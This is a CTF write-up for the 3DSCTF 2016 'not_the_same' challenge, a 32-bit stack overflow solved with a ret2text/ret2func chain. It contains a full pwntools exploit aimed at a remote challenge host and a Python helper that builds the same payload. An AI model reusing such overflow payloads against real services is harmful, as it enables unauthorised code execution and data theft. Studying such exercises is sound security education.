not_the_same_3dsctf_2016
Stack overflow, ret2text / ROP.

main

There is a backdoor function:

It reads the flag file into a global variable in the .bss segment, but nothing in the program ever prints that variable.

So the plan is: overflow the stack in main, return into the backdoor so the buffer gets filled, then ret2write to call write(1, buf, 45) on the variable, and finally return into exit. Every address used is a fixed 0x08xxxxxx address inside the binary itself (write and exit included), so no leak is needed.

Exploit:
from pwn import *
import time
context.log_level = 'debug'
sh = remote('node4.buuoj.cn', 26446)
p_backdoor = 0x080489A0   # backdoor: reads the flag file into the .bss buffer
p_fprintf = 0x08085950    # unused, kept for reference
p_write = 0x0806E270      # write() inside the binary
p_exit = 0x0804E660       # exit(): terminate cleanly after the flag is written
p_flag = 0x080ECA2D       # .bss buffer the backdoor fills (45 bytes)
# sh.recv()
# 0x2d bytes of padding reach main's saved return address.
# Chain: backdoor -> returns into write(1, p_flag, 45) -> returns into exit.
# Frame layout for write: [write][ret = exit][fd][buf][count]
payload = 0x2d * b'm' + p32(p_backdoor) + p32(p_write) + p32(p_exit)
payload += p32(1) + p32(p_flag) + p32(45)
sh.sendline(payload)      # the trailing newline ends the input read
sh.interactive()          # the flag is written to stdout
sh.close()
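As an added example that is not part of the original writeup, the chain builder below makes the stack layout the exploit relies on explicit: each ret2func frame is [func][return slot][args...], and because no pop-ret gadget is used, the return slot of an intermediate call has to be the next function's address, which is why only the last call (write) can carry arguments. It also checks for a 0x0a byte, which would truncate the chain when read by gets(). Names such as build_ret2func_chain and gets_safe are my own; the addresses are the ones from the script above, and struct.pack stands in for pwntools p32 so the block runs without pwntools installed.

```python
import struct


def p32(value):
    """Little-endian 32-bit pack, equivalent to pwntools p32() on i386."""
    return struct.pack('<I', value & 0xffffffff)


def build_ret2func_chain(padding_len, calls, final_ret, pad_byte=b'm'):
    """Lay out a 32-bit ret2func chain that uses no pop-ret gadgets.

    padding_len: bytes from the start of the overflowed buffer to the saved
                 return address (0x2d for this binary).
    calls:       list of (function_address, [args]) executed in order.
    final_ret:   where the last function returns to (exit here).

    Each frame is [func][return slot][args...]. Without a 'pop N; ret'
    gadget to discard arguments, the return slot of an intermediate call is
    the next function's address, so only the LAST call may carry arguments:
    an intermediate call with args would 'return' into its own first arg.
    """
    for addr, args in calls[:-1]:
        if args:
            raise ValueError(
                "call to %#x takes %d arg(s) but is not last; a pop-ret "
                "gadget would be needed to clean them up" % (addr, len(args)))
    chain = pad_byte * padding_len
    for i, (addr, args) in enumerate(calls):
        chain += p32(addr)
        if i == len(calls) - 1:
            chain += p32(final_ret)
            for arg in args:
                chain += p32(arg)
        # For an intermediate call, the next iteration's p32(addr) is
        # exactly what lands in its return slot.
    return chain


def gets_safe(payload):
    """gets() stops at the first newline, so an address or argument that
    contains 0x0a would cut the chain short. True when none is present."""
    return b'\n' not in payload


# Addresses taken from the exploit above (fixed addresses inside the binary).
BACKDOOR = 0x080489A0   # reads the flag file into the .bss buffer
WRITE = 0x0806E270
EXIT = 0x0804E660
FLAG_BUF = 0x080ECA2D
FLAG_LEN = 45


def build_payload():
    """The exact chain the exploit sends: backdoor -> write(1, FLAG_BUF, 45) -> exit."""
    chain = build_ret2func_chain(
        0x2d,
        [(BACKDOOR, []), (WRITE, [1, FLAG_BUF, FLAG_LEN])],
        EXIT)
    if not gets_safe(chain):
        raise ValueError("payload contains a newline; gets() would truncate it")
    return chain


if __name__ == '__main__':
    # Sending is left to the pwntools script above:
    # remote('node4.buuoj.cn', 26446).sendline(build_payload())
    print(build_payload().hex())
```

If a second function with arguments had to run before write (say, to open a file first), the builder refuses to lay it out, which is the point: that chain needs a pop-ret gadget with enough pops to discard the arguments, or a different ordering.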